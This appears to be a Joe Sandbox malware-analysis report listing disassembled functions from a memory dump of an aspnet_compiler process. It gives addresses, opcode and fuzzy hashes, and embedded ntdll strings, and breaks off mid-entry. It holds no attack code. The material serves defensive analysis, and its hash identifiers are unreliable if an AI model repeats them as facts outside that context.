                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                Function 0090FED0 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                Function 0090FE24 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                Function 0090FFB4 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                Function 0090FFFC Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                Function 0090FF34 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                Function 00938788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • Kernel-MUI-Language-Disallowed, xrefs: 00938914
                                                • Kernel-MUI-Language-Allowed, xrefs: 00938827
                                                • WindowsExcludedProcs, xrefs: 009387C1
                                                • Kernel-MUI-Language-SKU, xrefs: 009389FC
                                                • Kernel-MUI-Number-Allowed, xrefs: 009387E6
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: _wcspbrk
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 402402107-258546922
                                                • Opcode ID: ce9806898184e62619ce85bde7b7d4e482c459d6ada83373159015600ac85896
                                                • Instruction ID: 7933886f3f67479ed92c2c05ac5fc6f875a652e98cfaea1cb7981e3f0119657d
                                                • Opcode Fuzzy Hash: ce9806898184e62619ce85bde7b7d4e482c459d6ada83373159015600ac85896
                                                • Instruction Fuzzy Hash: 4EF1C4B2D00249EFCF11EF95C981AEEB7B8FB48300F15446AF505A7611EB35AA85DF60
                                                Function 009A822C Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: _wcsnlen
                                                • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                • API String ID: 3628947076-1387797911
                                                • Opcode ID: 24d389e4c1792a0ae01570e4ca24ed2b90ebc0c4bf532265b9049ac7f7794881
                                                • Instruction ID: ed9561b2ac03a114ff75624e302b01ddcdf5327b9f9fd6a094a533537bf44eea
                                                • Opcode Fuzzy Hash: 24d389e4c1792a0ae01570e4ca24ed2b90ebc0c4bf532265b9049ac7f7794881
                                                • Instruction Fuzzy Hash: 5741A575248209BEEB019AD1CD42FDFBBACEF46B48F100512BA04D6191DFB0DB519BE4
                                                Function 009513CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 94cdbd04d4cbbdfe01840ad0d72238f5854689f7170f7cd68456f9c9dac92a12
                                                • Instruction ID: 72cd99971ccd6134a5dcfda58467dc29bfd970ad00d573ec60a484d5d7635a30
                                                • Opcode Fuzzy Hash: 94cdbd04d4cbbdfe01840ad0d72238f5854689f7170f7cd68456f9c9dac92a12
                                                • Instruction Fuzzy Hash: 0C615872A00659AACF34CF9AC8909BFBBB9EFD4305B54C42DF9DA47540D334AA44CB60
                                                Function 009B3B8E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 84362a8477ab1537089d3747852534f3e3245df712ac74c7c990b2f588f729ba
                                                • Instruction ID: 8f7f797304264606a0cd0f06a97b5f6a79b94bf1976d824dea72bdaf56650d93
                                                • Opcode Fuzzy Hash: 84362a8477ab1537089d3747852534f3e3245df712ac74c7c990b2f588f729ba
                                                • Instruction Fuzzy Hash: 72617475900648ABCB24DF99CA415FEBFF9EF94320B14C529F8EDA7141E234EB409B61
                                                Function 00947EFD Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                Download Yara Rule
                                                APIs
                                                • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00963F12
                                                Strings
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00963F4A
                                                • Execute=1, xrefs: 00963F5E
                                                • ExecuteOptions, xrefs: 00963F04
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00963F75
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00963EC4
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0096E2FB
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 0096E345
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: BaseDataModuleQuery
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 3901378454-484625025
                                                • Opcode ID: 01b686058315b1a6d03843651c87880e787137fa004a72d4937e02a188c1abed
                                                • Instruction ID: 3189309a9ed8af18215a5cbe5e6d5940eb83ac165bb499ce3c7a33bd8813e358
                                                • Opcode Fuzzy Hash: 01b686058315b1a6d03843651c87880e787137fa004a72d4937e02a188c1abed
                                                • Instruction Fuzzy Hash: B7419B7164061D7ADF20AB94DC85FEBB3BCAB94704F0005E5B505A61C1E771AB858F61
                                                Function 00950B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: __fassign
                                                • String ID: .$:$:
                                                • API String ID: 3965848254-2308638275
                                                • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction ID: c83b3e10928f01a0504d1eaaeace5ad2196d40e8ed0cab7208212e9123c3becd
                                                • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction Fuzzy Hash: 0CA1B271D0030ADFDF24CF6AC8457BEB7B8AF96306F24896ADC82A7241D7345A49CB51
                                                Function 00950554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                Download Yara Rule
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00972206
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-4236105082
                                                • Opcode ID: a49bb86294a84375fe13ad321e4524786f80ad17bfb7e71ac7956e2621d0bc3c
                                                • Instruction ID: 34a331877e6935b1f84647ee9600a8807eb2a515549d6a15d48567cc22dc07bc
                                                • Opcode Fuzzy Hash: a49bb86294a84375fe13ad321e4524786f80ad17bfb7e71ac7956e2621d0bc3c
                                                • Instruction Fuzzy Hash: DB511B727542056FEB14CB19CC81FA633ADAFD8711F21C229FD59DB286E971EC418790
                                                Function 009514C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                Download Yara Rule
                                                APIs
                                                • ___swprintf_l.LIBCMT ref: 0097EA22
                                                  • Part of subcall function 009513CB: ___swprintf_l.LIBCMT ref: 0095146B
                                                  • Part of subcall function 009513CB: ___swprintf_l.LIBCMT ref: 00951490
                                                • ___swprintf_l.LIBCMT ref: 0095156D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: e49b4aa9e17330fc0bba32bbe3b8ec0e9566f3149d02a51b74ae9deae335e553
                                                • Instruction ID: 89db2ac7ae0434728841614becbdb4821c7fbb1c5351cb5bb8c3ac0fca1ce611
                                                • Opcode Fuzzy Hash: e49b4aa9e17330fc0bba32bbe3b8ec0e9566f3149d02a51b74ae9deae335e553
                                                • Instruction Fuzzy Hash: 0F21C172A00219ABCF21DF59CC41BEEB3BCAB94705F844451FC46D3140EB74AA998BE1
                                                Function 009B3DA7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: fbe8fa56723f82032111c96f1f5e723faa032c57aaff9d1ba3bbba6aab120828
                                                • Instruction ID: 7e70bd1126ba383191b9f1ad0095bfcc1372703c51a42506c6d50f82a20560bc
                                                • Opcode Fuzzy Hash: fbe8fa56723f82032111c96f1f5e723faa032c57aaff9d1ba3bbba6aab120828
                                                • Instruction Fuzzy Hash: 9021A172A0021AABCB10EE698D45AEF77AC9B94764F048526FC05A3141EB74DE54C7E1
                                                Function 009353A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                Download Yara Rule
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009722F4
                                                Strings
                                                • RTL: Re-Waiting, xrefs: 00972328
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009722FC
                                                • RTL: Resource at %p, xrefs: 0097230B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-871070163
                                                • Opcode ID: cba879de21a730e7216a3635e829d9ad6142dfab33ae0ba0d0ac33fbc131fe9d
